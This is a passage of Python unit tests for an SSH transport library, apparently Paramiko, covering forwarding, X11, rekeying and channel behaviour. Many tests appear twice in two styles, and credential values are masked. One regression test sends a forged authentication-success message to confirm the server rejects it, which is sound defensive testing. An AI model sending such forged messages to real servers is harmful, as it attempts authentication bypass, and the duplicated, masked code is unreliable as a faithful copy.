""" self.setup_test_server() chan = self.tc.open_session() chan.exec_command("yes") schan = self.ts.accept(1.0) requested = [] def handler(c, addr_port): addr, port = addr_port requested.append((addr, port)) self.tc._queue_incoming_channel(c) self.assertEqual( None, getattr(self.server, "_x11_screen_number", None) ) cookie = chan.request_x11(0, single_connection=True, handler=handler) self.assertEqual(0, self.server._x11_screen_number) self.assertEqual("MIT-MAGIC-COOKIE-1", self.server._x11_auth_protocol) self.assertEqual(cookie, self.server._x11_auth_cookie) self.assertEqual(True, self.server._x11_single_connection) x11_server = self.ts.open_x11_channel(("localhost", 6093)) x11_client = self.tc.accept() self.assertEqual("localhost", requested[0][0]) self.assertEqual(6093, requested[0][1]) x11_server.send("hello") self.assertEqual(b"hello", x11_client.recv(5)) x11_server.close() x11_client.close() chan.close() schan.close() def test_reverse_port_forwarding(self): """ verify that a client can ask the server to open a reverse port for forwarding. """ self.setup_test_server() chan = self.tc.open_session() chan.exec_command("yes") self.ts.accept(1.0) requested = [] def handler(c, origin_addr_port, server_addr_port): requested.append(origin_addr_port) requested.append(server_addr_port) self.tc._queue_incoming_channel(c) port = self.tc.request_port_forward("127.0.0.1", 0, handler) self.assertEqual(port, self.server._listen.getsockname()[1]) cs = socket.socket() cs.connect(("127.0.0.1", port)) ss, _ = self.server._listen.accept() sch = self.ts.open_forwarded_tcpip_channel( ss.getsockname(), ss.getpeername() ) cch = self.tc.accept() sch.send("hello") self.assertEqual(b"hello", cch.recv(5)) sch.close() cch.close() ss.close() cs.close() # now cancel it. self.tc.cancel_port_forward("127.0.0.1", port) self.assertTrue(self.server._listen is None) def test_port_forwarding(self): """ verify that a client can forward new connections from a locally- forwarded port. 
""" self.setup_test_server() chan = self.tc.open_session() chan.exec_command("yes") self.ts.accept(1.0) # open a port on the "server" that the client will ask to forward to. greeting_server = socket.socket() greeting_server.bind(("127.0.0.1", 0)) greeting_server.listen(1) greeting_port = greeting_server.getsockname()[1] cs = self.tc.open_channel( "direct-tcpip", ("127.0.0.1", greeting_port), ("", 9000) ) sch = self.ts.accept(1.0) cch = socket.socket() cch.connect(self.server._tcpip_dest) ss, _ = greeting_server.accept() ss.send(b"Hello!\n") ss.close() sch.send(cch.recv(8192)) sch.close() self.assertEqual(b"Hello!\n", cs.recv(7)) cs.close() def test_stderr_select(self): """ verify that select() on a channel works even if only stderr is receiving data. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) # nothing should be ready r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.send_stderr("hello\n") # something should be ready now (give it 1 second to appear) for i in range(10): r, w, e = select.select([chan], [], [], 0.1) if chan in r: break time.sleep(0.1) self.assertEqual([chan], r) self.assertEqual([], w) self.assertEqual([], e) self.assertEqual(b"hello\n", chan.recv_stderr(6)) # and, should be dead again now r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.close() chan.close() def test_send_ready(self): """ verify that send_ready() indicates when a send would not block. 
""" self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) self.assertEqual(chan.send_ready(), True) total = 0 K = "*" * 1024 limit = 1 + (64 * 2 ** 15) while total < limit: chan.send(K) total += len(K) if not chan.send_ready(): break self.assertTrue(total < limit) schan.close() chan.close() self.assertEqual(chan.send_ready(), True) def test_rekey_deadlock(self): """ Regression test for deadlock when in-transit messages are received after MSG_KEXINIT is sent Note: When this test fails, it may leak threads. """ # Test for an obscure deadlocking bug that can occur if we receive # certain messages while initiating a key exchange. # # The deadlock occurs as follows: # # In the main thread: # 1. The user's program calls Channel.send(), which sends # MSG_CHANNEL_DATA to the remote host. # 2. Packetizer discovers that REKEY_BYTES has been exceeded, and # sets the __need_rekey flag. # # In the Transport thread: # 3. Packetizer notices that the __need_rekey flag is set, and raises # NeedRekeyException. # 4. In response to NeedRekeyException, the transport thread sends # MSG_KEXINIT to the remote host. # # On the remote host (using any SSH implementation): # 5. The MSG_CHANNEL_DATA is received, and MSG_CHANNEL_WINDOW_ADJUST # is sent. # 6. The MSG_KEXINIT is received, and a corresponding MSG_KEXINIT is # sent. # # In the main thread: # 7. The user's program calls Channel.send(). # 8. Channel.send acquires Channel.lock, then calls # Transport._send_user_message(). # 9. Transport._send_user_message waits for Transport.clear_to_send # to be set (i.e., it waits for re-keying to complete). # Channel.lock is still held. # # In the Transport thread: # 10. MSG_CHANNEL_WINDOW_ADJUST is received; Channel._window_adjust # is called to handle it. # 11. Channel._window_adjust tries to acquire Channel.lock, but it # blocks because the lock is already held by the main thread. 
# # The result is that the Transport thread never processes the remote # host's MSG_KEXINIT packet, because it becomes deadlocked while # handling the preceding MSG_CHANNEL_WINDOW_ADJUST message. # We set up two separate threads for sending and receiving packets, # while the main thread acts as a watchdog timer. If the timer # expires, a deadlock is assumed. class SendThread(threading.Thread): def __init__(self, chan, iterations, done_event): threading.Thread.__init__( self, None, None, self.__class__.__name__ ) self.setDaemon(True) self.chan = chan self.iterations = iterations self.done_event = done_event self.watchdog_event = threading.Event() self.last = None def run(self): try: for i in range(1, 1 + self.iterations): if self.done_event.is_set(): break self.watchdog_event.set() # print i, "SEND" self.chan.send("x" * 2048) finally: self.done_event.set() self.watchdog_event.set() class ReceiveThread(threading.Thread): def __init__(self, chan, done_event): threading.Thread.__init__( self, None, None, self.__class__.__name__ ) self.setDaemon(True) self.chan = chan self.done_event = done_event self.watchdog_event = threading.Event() def run(self): try: while not self.done_event.is_set(): if self.chan.recv_ready(): chan.recv(65536) self.watchdog_event.set() else: if random.randint(0, 1): time.sleep(random.randint(0, 500) / 1000.0) finally: self.done_event.set() self.watchdog_event.set() self.setup_test_server() self.ts.packetizer.REKEY_BYTES = 2048 chan = self.tc.open_session() chan.exec_command("yes") schan = self.ts.accept(1.0) # Monkey patch the client's Transport._handler_table so that the client # sends MSG_CHANNEL_WINDOW_ADJUST whenever it receives an initial # MSG_KEXINIT. This is used to simulate the effect of network latency # on a real MSG_CHANNEL_WINDOW_ADJUST message. 
self.tc._handler_table = ( self.tc._handler_table.copy() ) # copy per-class dictionary _negotiate_keys = self.tc._handler_table[MSG_KEXINIT] def _negotiate_keys_wrapper(self, m): if self.local_kex_init is None: # Remote side sent KEXINIT # Simulate in-transit MSG_CHANNEL_WINDOW_ADJUST by sending it # before responding to the incoming MSG_KEXINIT. m2 = Message() m2.add_byte(cMSG_CHANNEL_WINDOW_ADJUST) m2.add_int(chan.remote_chanid) m2.add_int(1) # bytes to add self._send_message(m2) return _negotiate_keys(self, m) self.tc._handler_table[MSG_KEXINIT] = _negotiate_keys_wrapper # Parameters for the test iterations = 500 # The deadlock does not happen every time, but it # should after many iterations. timeout = 5 # This event is set when the test is completed done_event = threading.Event() # Start the sending thread st = SendThread(schan, iterations, done_event) st.start() # Start the receiving thread rt = ReceiveThread(chan, done_event) rt.start() # Act as a watchdog timer, checking deadlocked = False while not deadlocked and not done_event.is_set(): for event in (st.watchdog_event, rt.watchdog_event): event.wait(timeout) if done_event.is_set(): break if not event.is_set(): deadlocked = True break event.clear() # Tell the threads to stop (if they haven't already stopped). Note # that if one or more threads are deadlocked, they might hang around # forever (until the process exits). done_event.set() # Assertion: We must not have detected a timeout. self.assertFalse(deadlocked) # Close the channels schan.close() chan.close() def test_sanitze_packet_size(self): """ verify that we conform to the rfc of packet and window sizes. """ for val, correct in [ (4095, MIN_PACKET_SIZE), (None, DEFAULT_MAX_PACKET_SIZE), (2 ** 32, MAX_WINDOW_SIZE), ]: self.assertEqual(self.tc._sanitize_packet_size(val), correct) def test_sanitze_window_size(self): """ verify that we conform to the rfc of packet and window sizes. 
""" for val, correct in [ (32767, MIN_WINDOW_SIZE), (None, DEFAULT_WINDOW_SIZE), (2 ** 32, MAX_WINDOW_SIZE), ]: self.assertEqual(self.tc._sanitize_window_size(val), correct) @slow def test_handshake_timeout(self): """ verify that we can get a hanshake timeout. """ # Tweak client Transport instance's Packetizer instance so # its read_message() sleeps a bit. This helps prevent race conditions # where the client Transport's timeout timer thread doesn't even have # time to get scheduled before the main client thread finishes # handshaking with the server. # (Doing this on the server's transport *sounds* more 'correct' but # actually doesn't work nearly as well for whatever reason.) class SlowPacketizer(Packetizer): def read_message(self): time.sleep(1) return super(SlowPacketizer, self).read_message() # NOTE: prettttty sure since the replaced .packetizer Packetizer is now # no longer doing anything with its copy of the socket...everything'll # be fine. Even tho it's a bit squicky. self.tc.packetizer = SlowPacketizer(self.tc.sock) # Continue with regular test red tape. host_key = RSAKey.from_private_key_file(_support("test_rsa.key")) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assertTrue(not event.is_set()) self.tc.handshake_timeout = 0.000000000001 self.ts.start_server(event, server) self.assertRaises( EOFError, self.tc.connect, hostkey=public_host_key, username="******", password="******", ) def test_select_after_close(self): """ verify that select works when a channel is already closed. 
""" self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) schan.close() # give client a moment to receive close notification time.sleep(0.1) r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([chan], r) self.assertEqual([], w) self.assertEqual([], e) def test_channel_send_misc(self): """ verify behaviours sending various instances to a channel """ self.setup_test_server() text = u"\xa7 slice me nicely" with self.tc.open_session() as chan: schan = self.ts.accept(1.0) if schan is None: self.fail("Test server transport failed to accept") sfile = schan.makefile() # TypeError raised on non string or buffer type self.assertRaises(TypeError, chan.send, object()) self.assertRaises(TypeError, chan.sendall, object()) # sendall() accepts a unicode instance chan.sendall(text) expected = text.encode("utf-8") self.assertEqual(sfile.read(len(expected)), expected) @needs_builtin("buffer") def test_channel_send_buffer(self): """ verify sending buffer instances to a channel """ self.setup_test_server() data = 3 * b"some test data\n whole" with self.tc.open_session() as chan: schan = self.ts.accept(1.0) if schan is None: self.fail("Test server transport failed to accept") sfile = schan.makefile() # send() accepts buffer instances sent = 0 while sent < len(data): sent += chan.send(buffer(data, sent, 8)) # noqa self.assertEqual(sfile.read(len(data)), data) # sendall() accepts a buffer instance chan.sendall(buffer(data)) # noqa self.assertEqual(sfile.read(len(data)), data) @needs_builtin("memoryview") def test_channel_send_memoryview(self): """ verify sending memoryview instances to a channel """ self.setup_test_server() data = 3 * b"some test data\n whole" with self.tc.open_session() as chan: schan = self.ts.accept(1.0) if schan is None: self.fail("Test server transport failed to accept") sfile = schan.makefile() # send() accepts memoryview slices sent = 0 view = memoryview(data) while sent < len(view): sent += 
chan.send(view[sent : sent + 8]) self.assertEqual(sfile.read(len(data)), data) # sendall() accepts a memoryview instance chan.sendall(memoryview(data)) self.assertEqual(sfile.read(len(data)), data) def test_server_rejects_open_channel_without_auth(self): try: self.setup_test_server(connect_kwargs={}) self.tc.open_session() except ChannelException as e: assert e.code == OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED else: assert False, "Did not raise ChannelException!" def test_server_rejects_arbitrary_global_request_without_auth(self): self.setup_test_server(connect_kwargs={}) # NOTE: this dummy global request kind would normally pass muster # from the test server. self.tc.global_request("acceptable") # Global requests never raise exceptions, even on failure (not sure why # this was the original design...ugh.) Best we can do to tell failure # happened is that the client transport's global_response was set back # to None; if it had succeeded, it would be the response Message. err = "Unauthed global response incorrectly succeeded!" assert self.tc.global_response is None, err def test_server_rejects_port_forward_without_auth(self): # NOTE: at protocol level port forward requests are treated same as a # regular global request, but Paramiko server implements a special-case # method for it, so it gets its own test. (plus, THAT actually raises # an exception on the client side, unlike the general case...) self.setup_test_server(connect_kwargs={}) try: self.tc.request_port_forward("localhost", 1234) except SSHException as e: assert "forwarding request denied" in str(e) else: assert False, "Did not raise SSHException!" 
def _send_unimplemented(self, server_is_sender):
    """
    Have one transport send a bare MSG_UNIMPLEMENTED to the other and check
    that the receiving transport does not answer it.

    :param server_is_sender: True to send from the server transport
        (``self.ts``) to the client (``self.tc``); False for the reverse.
    """
    self.setup_test_server()
    if server_is_sender:
        sender, recipient = self.ts, self.tc
    else:
        sender, recipient = self.tc, self.ts
    # Swap the recipient's outbound path for a Mock so any reply it tries
    # to send is recorded instead of transmitted.
    outbound_spy = Mock()
    recipient._send_message = outbound_spy
    packet = Message()
    packet.add_byte(cMSG_UNIMPLEMENTED)
    sender._send_message(packet)
    # TODO: nothing signals when the recipient has processed the packet
    # (no existing threading event fits, and we cannot block on a reply
    # because the whole point is that none is sent), so use a short sleep.
    time.sleep(0.1)
    assert not outbound_spy.called


def test_server_does_not_respond_to_MSG_UNIMPLEMENTED(self):
    """A client-sent MSG_UNIMPLEMENTED must not provoke a server reply."""
    self._send_unimplemented(server_is_sender=False)


def test_client_does_not_respond_to_MSG_UNIMPLEMENTED(self):
    """A server-sent MSG_UNIMPLEMENTED must not provoke a client reply."""
    self._send_unimplemented(server_is_sender=True)


def _send_client_message(self, message_type):
    """
    Start the test server, connect the client with no connect arguments
    (``connect_kwargs={}``), mock out the server's outbound path, and send
    the server a message made of only the given type byte.

    :param message_type: integer message number, converted with byte_chr.
    """
    self.setup_test_server(connect_kwargs={})
    self.ts._send_message = Mock()
    # NOTE: most of these message types would normally carry more fields;
    # a lone type byte is enough to exercise the dispatch level under test.
    packet = Message()
    # TODO: the cMSG_XXX / MSG_XXX split is awkward; cMSG_XXX is almost
    # always byte_chr(MSG_XXX), so build the byte that way here.
    packet.add_byte(byte_chr(message_type))
    self.tc._send_message(packet)
    # Same limitation as _send_unimplemented: no event to wait on.
    time.sleep(0.1)


def _expect_unimplemented(self):
    """
    Assert the server sent exactly one message and that it was
    MSG_UNIMPLEMENTED, meaning the incoming message reached the end of
    dispatch instead of being genuinely handled.
    """
    # NOTE: with the bug present this is typically the first check to
    # fail, because real handling often sends nothing back right away.
    outbound = self.ts._send_message
    assert outbound.call_count == 1
    reply = outbound.call_args[0][0]
    # The captured Message is pre-send (not post-receive), so rewind it
    # before reading.
    reply.rewind()
    assert reply.get_byte() == cMSG_UNIMPLEMENTED


def test_server_transports_reject_client_message_types(self):
    """
    Each message type in AuthHandler._client_handler_table, when sent to
    a server, must be answered with MSG_UNIMPLEMENTED.
    """
    # TODO: cover Transport's own handler tables as well, not only the
    # inner auth handler's table (see TODOs in auth_handler.py).
    for client_side_type in AuthHandler._client_handler_table:
        self._send_client_message(client_side_type)
        self._expect_unimplemented()
        # Start the next iteration from freshly built transports.
        self.tearDown()
        self.setUp()


def test_server_rejects_client_MSG_USERAUTH_SUCCESS(self):
    """
    A client sending MSG_USERAUTH_SUCCESS must not authenticate the server
    side; the server must treat it as unimplemented.
    """
    self._send_client_message(MSG_USERAUTH_SUCCESS)
    # Sanity checks: neither authentication flag may have flipped.
    assert not self.ts.authenticated
    assert not self.ts.auth_handler.authenticated
    # The behaviour the real fix introduced.
    self._expect_unimplemented()
class TransportTest(unittest.TestCase):
    """
    Exercise Transport end-to-end over a pair of linked loopback sockets.

    ``setUp`` links two LoopSockets and wraps each in a Transport:
    ``self.tc`` acts as the client and ``self.ts`` as the server.
    """

    def setUp(self):
        self.socks = LoopSocket()
        self.sockc = LoopSocket()
        self.sockc.link(self.socks)
        self.tc = Transport(self.sockc)
        self.ts = Transport(self.socks)

    def tearDown(self):
        self.tc.close()
        self.ts.close()
        self.socks.close()
        self.sockc.close()

    @staticmethod
    def _select_until_readable(chan, attempts=10):
        """
        Poll ``select()`` on ``chan`` (0.1s timeout, 0.1s sleep between
        polls) until it reports readable or ``attempts`` polls are used.

        :return: the ``(r, w, e)`` triple from the last poll.
        """
        for _ in range(attempts):
            r, w, e = select.select([chan], [], [], 0.1)
            if chan in r:
                break
            time.sleep(0.1)
        return r, w, e

    def setup_test_server(self, client_options=None, server_options=None):
        """
        Start the server transport and connect the client to it.

        :param client_options: optional callable given the client's
            SecurityOptions before negotiation (e.g. to force algorithms).
        :param server_options: same, for the server's SecurityOptions.

        Afterwards ``self.server`` is the NullServer handling server-side
        callbacks, and the server transport has been asserted active.
        """
        host_key = RSAKey.from_private_key_file(test_path('test_rsa.key'))
        public_host_key = RSAKey(data=host_key.asbytes())
        self.ts.add_server_key(host_key)

        if client_options is not None:
            client_options(self.tc.get_security_options())
        if server_options is not None:
            server_options(self.ts.get_security_options())

        event = threading.Event()
        self.server = NullServer()
        self.assertTrue(not event.is_set())
        self.ts.start_server(event, self.server)
        # NOTE(review): these credential literals look redacted in this copy
        # ('******') while test_3_simple expects the username 'slowdive';
        # confirm against the credentials NullServer accepts.
        self.tc.connect(hostkey=public_host_key,
                        username='******', password='******')
        event.wait(1.0)
        self.assertTrue(event.is_set())
        self.assertTrue(self.ts.is_active())

    def test_1_security_options(self):
        """
        verify that SecurityOptions accepts known ciphers, rejects unknown
        cipher names with ValueError and an integer value with TypeError.
        """
        o = self.tc.get_security_options()
        self.assertEqual(type(o), SecurityOptions)
        self.assertNotEqual(('aes256-cbc', 'blowfish-cbc'), o.ciphers)
        o.ciphers = ('aes256-cbc', 'blowfish-cbc')
        self.assertEqual(('aes256-cbc', 'blowfish-cbc'), o.ciphers)
        with self.assertRaises(ValueError):
            o.ciphers = ('aes256-cbc', 'made-up-cipher')
        with self.assertRaises(TypeError):
            o.ciphers = 23

    def test_2_compute_key(self):
        """
        verify _compute_key against a fixed known-answer vector.
        """
        self.tc.K = 123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929
        self.tc.H = b'\x0C\x83\x07\xCD\xE6\x85\x6F\xF3\x0B\xA9\x36\x84\xEB\x0F\x04\xC2\x52\x0E\x9E\xD3'
        self.tc.session_id = self.tc.H
        key = self.tc._compute_key('C', 32)
        self.assertEqual(
            b'207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995',
            hexlify(key).upper())

    def test_3_simple(self):
        """
        verify that we can establish an ssh link with ourselves across the
        loopback sockets.  this is hardly "simple" but it's simpler than the
        later tests. :)
        """
        host_key = RSAKey.from_private_key_file(test_path('test_rsa.key'))
        public_host_key = RSAKey(data=host_key.asbytes())
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assertTrue(not event.is_set())
        # Nothing is known about the peer before the handshake.
        self.assertEqual(None, self.tc.get_username())
        self.assertEqual(None, self.ts.get_username())
        self.assertEqual(False, self.tc.is_authenticated())
        self.assertEqual(False, self.ts.is_authenticated())
        self.ts.start_server(event, server)
        self.tc.connect(hostkey=public_host_key,
                        username='******', password='******')
        event.wait(1.0)
        self.assertTrue(event.is_set())
        self.assertTrue(self.ts.is_active())
        self.assertEqual('slowdive', self.tc.get_username())
        self.assertEqual('slowdive', self.ts.get_username())
        self.assertEqual(True, self.tc.is_authenticated())
        self.assertEqual(True, self.ts.is_authenticated())

    def test_3a_long_banner(self):
        """
        verify that a long banner doesn't mess up the handshake.
        """
        host_key = RSAKey.from_private_key_file(test_path('test_rsa.key'))
        public_host_key = RSAKey(data=host_key.asbytes())
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assertTrue(not event.is_set())
        # Push the banner onto the server's socket before the handshake.
        self.socks.send(LONG_BANNER)
        self.ts.start_server(event, server)
        self.tc.connect(hostkey=public_host_key,
                        username='******', password='******')
        event.wait(1.0)
        self.assertTrue(event.is_set())
        self.assertTrue(self.ts.is_active())

    def test_4_special(self):
        """
        verify that the client can demand odd handshake settings, and can
        renegotiate keys in mid-stream.
        """
        def force_algorithms(options):
            options.ciphers = ('aes256-cbc', )
            options.digests = ('hmac-md5-96', )

        self.setup_test_server(client_options=force_algorithms)
        self.assertEqual('aes256-cbc', self.tc.local_cipher)
        self.assertEqual('aes256-cbc', self.tc.remote_cipher)
        # hmac-md5-96 truncates the MAC to 96 bits = 12 bytes.
        self.assertEqual(12, self.tc.packetizer.get_mac_size_out())
        self.assertEqual(12, self.tc.packetizer.get_mac_size_in())

        self.tc.send_ignore(1024)
        self.tc.renegotiate_keys()
        self.ts.send_ignore(1024)

    def test_5_keepalive(self):
        """
        verify that the keepalive will be sent.
        """
        self.setup_test_server()
        self.assertEqual(None, getattr(self.server, '_global_request', None))
        self.tc.set_keepalive(1)
        time.sleep(2)
        # NOTE(review): this expected literal looks redacted in this copy;
        # confirm it matches the global request name keepalive sends.
        self.assertEqual('*****@*****.**', self.server._global_request)

    def test_6_exec_command(self):
        """
        verify that exec_command() does something reasonable.
        """
        self.setup_test_server()

        # A command the server refuses must raise on the client.
        chan = self.tc.open_session()
        self.ts.accept(1.0)
        with self.assertRaises(SSHException):
            chan.exec_command('no')

        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)
        schan.send('Hello there.\n')
        schan.send_stderr('This is on stderr.\n')
        schan.close()

        f = chan.makefile()
        self.assertEqual('Hello there.\n', f.readline())
        self.assertEqual('', f.readline())
        f = chan.makefile_stderr()
        self.assertEqual('This is on stderr.\n', f.readline())
        self.assertEqual('', f.readline())

        # now try it with combined stdout/stderr
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)
        schan.send('Hello there.\n')
        schan.send_stderr('This is on stderr.\n')
        schan.close()

        chan.set_combine_stderr(True)
        f = chan.makefile()
        self.assertEqual('Hello there.\n', f.readline())
        self.assertEqual('This is on stderr.\n', f.readline())
        self.assertEqual('', f.readline())

    def test_6a_channel_can_be_used_as_context_manager(self):
        """
        verify that client and server channels can be used in ``with``
        statements while running a command.
        """
        self.setup_test_server()

        with self.tc.open_session() as chan:
            with self.ts.accept(1.0) as schan:
                chan.exec_command('yes')
                schan.send('Hello there.\n')
                schan.close()

                f = chan.makefile()
                self.assertEqual('Hello there.\n', f.readline())
                self.assertEqual('', f.readline())

    def test_7_invoke_shell(self):
        """
        verify that invoke_shell() does something reasonable.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.invoke_shell()
        schan = self.ts.accept(1.0)
        chan.send('communist j. cat\n')
        f = schan.makefile()
        self.assertEqual('communist j. cat\n', f.readline())
        chan.close()
        self.assertEqual('', f.readline())

    def test_8_channel_exception(self):
        """
        verify that ChannelException is thrown for a bad open-channel request.
        """
        self.setup_test_server()
        with self.assertRaises(ChannelException) as ctx:
            self.tc.open_channel('bogus')
        self.assertEqual(OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED,
                         ctx.exception.code)

    def test_9_exit_status(self):
        """
        verify that get_exit_status() works.
        """
        self.setup_test_server()

        chan = self.tc.open_session()
        schan = self.ts.accept(1.0)
        chan.exec_command('yes')
        schan.send('Hello there.\n')
        self.assertTrue(not chan.exit_status_ready())
        # trigger an EOF
        schan.shutdown_read()
        schan.shutdown_write()
        schan.send_exit_status(23)
        schan.close()

        f = chan.makefile()
        self.assertEqual('Hello there.\n', f.readline())
        self.assertEqual('', f.readline())
        # Poll for the exit status for up to ~5 seconds.
        count = 0
        while not chan.exit_status_ready():
            time.sleep(0.1)
            count += 1
            if count > 50:
                raise Exception("timeout")
        self.assertEqual(23, chan.recv_exit_status())
        chan.close()

    def test_A_select(self):
        """
        verify that select() on a channel works.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.invoke_shell()
        schan = self.ts.accept(1.0)

        # nothing should be ready
        r, w, e = select.select([chan], [], [], 0.1)
        self.assertEqual([], r)
        self.assertEqual([], w)
        self.assertEqual([], e)

        schan.send('hello\n')

        # something should be ready now (give it 1 second to appear)
        r, w, e = self._select_until_readable(chan)
        self.assertEqual([chan], r)
        self.assertEqual([], w)
        self.assertEqual([], e)

        self.assertEqual(b'hello\n', chan.recv(6))

        # and, should be dead again now
        r, w, e = select.select([chan], [], [], 0.1)
        self.assertEqual([], r)
        self.assertEqual([], w)
        self.assertEqual([], e)

        schan.close()

        # detect eof?
        r, w, e = self._select_until_readable(chan)
        self.assertEqual([chan], r)
        self.assertEqual([], w)
        self.assertEqual([], e)
        self.assertEqual(b'', chan.recv(16))

        # make sure the pipe is still open for now...
        p = chan._pipe
        self.assertEqual(False, p._closed)
        chan.close()
        # ...and now is closed.
        self.assertEqual(True, p._closed)

    def test_B_renegotiate(self):
        """
        verify that a transport can correctly renegotiate mid-stream.
        """
        self.setup_test_server()
        # A low threshold so 20 KiB of traffic forces a rekey.
        self.tc.packetizer.REKEY_BYTES = 16384
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        self.assertEqual(self.tc.H, self.tc.session_id)
        for _ in range(20):
            chan.send('x' * 1024)
        chan.close()

        # allow a few seconds for the rekeying to complete
        for _ in range(50):
            if self.tc.H != self.tc.session_id:
                break
            time.sleep(0.1)
        self.assertNotEqual(self.tc.H, self.tc.session_id)

        schan.close()

    def test_C_compression(self):
        """
        verify that zlib compression is basically working.
        """
        def force_compression(o):
            o.compression = ('zlib', )

        self.setup_test_server(force_compression, force_compression)
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        # Named so as not to shadow the builtin ``bytes``.
        sent_before = self.tc.packetizer._Packetizer__sent_bytes
        chan.send('x' * 1024)
        sent_after = self.tc.packetizer._Packetizer__sent_bytes
        # tests show this is actually compressed to *52 bytes*, including
        # packet overhead.
        self.assertTrue(sent_after - sent_before < 1024)
        self.assertEqual(52, sent_after - sent_before)

        chan.close()
        schan.close()

    def test_D_x11(self):
        """
        verify that an x11 port can be requested and opened.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        requested = []

        def handler(c, addr_port):
            addr, port = addr_port
            requested.append((addr, port))
            self.tc._queue_incoming_channel(c)

        self.assertEqual(None, getattr(self.server, '_x11_screen_number', None))
        cookie = chan.request_x11(0, single_connection=True, handler=handler)
        self.assertEqual(0, self.server._x11_screen_number)
        self.assertEqual('MIT-MAGIC-COOKIE-1', self.server._x11_auth_protocol)
        self.assertEqual(cookie, self.server._x11_auth_cookie)
        self.assertEqual(True, self.server._x11_single_connection)

        x11_server = self.ts.open_x11_channel(('localhost', 6093))
        x11_client = self.tc.accept()
        self.assertEqual('localhost', requested[0][0])
        self.assertEqual(6093, requested[0][1])

        x11_server.send('hello')
        self.assertEqual(b'hello', x11_client.recv(5))

        x11_server.close()
        x11_client.close()
        chan.close()
        schan.close()

    def test_E_reverse_port_forwarding(self):
        """
        verify that a client can ask the server to open a reverse port for
        forwarding.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        requested = []

        def handler(c, origin_addr_port, server_addr_port):
            requested.append(origin_addr_port)
            requested.append(server_addr_port)
            self.tc._queue_incoming_channel(c)

        # Port 0 lets the server pick; the chosen port is returned.
        port = self.tc.request_port_forward('127.0.0.1', 0, handler)
        self.assertEqual(port, self.server._listen.getsockname()[1])

        cs = socket.socket()
        cs.connect(('127.0.0.1', port))
        ss, _ = self.server._listen.accept()
        sch = self.ts.open_forwarded_tcpip_channel(ss.getsockname(),
                                                   ss.getpeername())
        cch = self.tc.accept()

        sch.send('hello')
        self.assertEqual(b'hello', cch.recv(5))
        sch.close()
        cch.close()
        ss.close()
        cs.close()

        # now cancel it.
        self.tc.cancel_port_forward('127.0.0.1', port)
        self.assertTrue(self.server._listen is None)

    def test_F_port_forwarding(self):
        """
        verify that a client can forward new connections from a locally-
        forwarded port.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)

        # open a port on the "server" that the client will ask to forward to.
        greeting_server = socket.socket()
        greeting_server.bind(('127.0.0.1', 0))
        greeting_server.listen(1)
        greeting_port = greeting_server.getsockname()[1]

        cs = self.tc.open_channel('direct-tcpip',
                                  ('127.0.0.1', greeting_port),
                                  ('', 9000))
        sch = self.ts.accept(1.0)
        cch = socket.socket()
        cch.connect(self.server._tcpip_dest)

        ss, _ = greeting_server.accept()
        ss.send(b'Hello!\n')
        ss.close()
        sch.send(cch.recv(8192))
        sch.close()

        self.assertEqual(b'Hello!\n', cs.recv(7))
        cs.close()
        # Release the plain sockets this test opened.
        cch.close()
        greeting_server.close()

    def test_G_stderr_select(self):
        """
        verify that select() on a channel works even if only stderr is
        receiving data.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.invoke_shell()
        schan = self.ts.accept(1.0)

        # nothing should be ready
        r, w, e = select.select([chan], [], [], 0.1)
        self.assertEqual([], r)
        self.assertEqual([], w)
        self.assertEqual([], e)

        schan.send_stderr('hello\n')

        # something should be ready now (give it 1 second to appear)
        r, w, e = self._select_until_readable(chan)
        self.assertEqual([chan], r)
        self.assertEqual([], w)
        self.assertEqual([], e)

        self.assertEqual(b'hello\n', chan.recv_stderr(6))

        # and, should be dead again now
        r, w, e = select.select([chan], [], [], 0.1)
        self.assertEqual([], r)
        self.assertEqual([], w)
        self.assertEqual([], e)

        schan.close()
        chan.close()

    def test_H_send_ready(self):
        """
        verify that send_ready() indicates when a send would not block.
        """
        self.setup_test_server()
        chan = self.tc.open_session()
        chan.invoke_shell()
        schan = self.ts.accept(1.0)

        self.assertEqual(chan.send_ready(), True)
        total = 0
        K = '*' * 1024
        limit = 1 + (64 * 2**15)
        # Keep sending until send_ready() reports the window is exhausted;
        # that must happen before ``limit`` bytes are sent.
        while total < limit:
            chan.send(K)
            total += len(K)
            if not chan.send_ready():
                break
        self.assertTrue(total < limit)

        schan.close()
        chan.close()
        self.assertEqual(chan.send_ready(), True)

    def test_I_rekey_deadlock(self):
        """
        Regression test for deadlock when in-transit messages are received
        after MSG_KEXINIT is sent

        Note: When this test fails, it may leak threads.
        """

        # Test for an obscure deadlocking bug that can occur if we receive
        # certain messages while initiating a key exchange.
        #
        # The deadlock occurs as follows:
        #
